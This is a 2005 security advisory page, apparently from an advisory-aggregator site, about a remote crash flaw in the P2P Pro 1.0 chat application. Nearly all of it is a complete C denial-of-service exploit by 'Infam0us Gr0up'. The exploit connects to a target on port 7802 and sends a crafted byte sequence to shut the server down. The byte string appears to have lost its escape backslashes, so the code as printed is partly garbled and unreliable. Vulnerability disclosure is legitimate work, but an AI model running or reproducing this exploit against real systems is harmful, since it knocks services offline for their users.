Ads P2P Pro Command DoS Monday, 05 September 2005 Summary P2P Pro is "freeware/opensource who need have own chat system to talk on private LAN or WAN. It allows two users to chat and send files (of any size). This is a stand-alone application, meaning there are not two programs (client and server).The client and server are both built in to the same application". By sending a special command to P2P Pro server it possible for a remote attacker to cause it to crash. Credit: The information has been provided by eric basher. Details Vulnerable Systems: * P2P Pro version 1.0 Exploit: /* P2P Pro Command DOS Exploit ------------------------------------ Infam0us Gr0up - Securiti Research Info: infamous.2hell.com Vendor URL: http://www.digital-revolution.org/P2PPro.html */ #include #include #include #pragma comment(lib, "ws2_32.lib") char doscore[] = "x3fx3fxbcx59x70 " "x32x70x3fxe1 " "x2bx5cx3fxa6xebxa6" "x50x46x2bx5cx3fxa6xebxa6" "x50x4fx57x4ex45x44x2ex74" "x78x74x2bx5cx3fxa6xebxa6" "x50x31x32x33x32x34x32x2ex6bx62"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET inetdos; if (argc < 2) { printf(" P2P Pro Command DOS Exploit ", argv[0]); printf(" -------------------------------------- ", argv[0]); printf(" Infam0us Gr0up - Securiti Research ", argv[0]); printf("[-]Usage: %s [target] [port] ", argv[0]); printf("[?]Exam: %s localhost 7802 ", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 7802; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); inetdos = socket(AF_INET, SOCK_STREAM, 0); if(inetdos==INVALID_SOCKET) { printf("Socket ERROR "); exit(1); } printf(" P2P Pro Command DOS Exploit ", argv[0]); printf(" -------------------------------------- ", argv[0]); printf("Resolve host... "); if ((pTarget = gethostbyname(target)) == NULL) { printf("FAILED ", argv[0]); exit(1); } printf("[OK] "); memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("[+] Connecting... "); if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("FAILED "); exit(1); } printf("[OK] "); printf("Target listen.. "); printf("Sending bad procedure... "); if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) { printf("ERROR "); closesocket(inetdos); exit(1); } printf("[OK] "); printf("[+] Server SHUTDOWNED! "); closesocket(inetdos); WSACleanup(); return 0; }   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.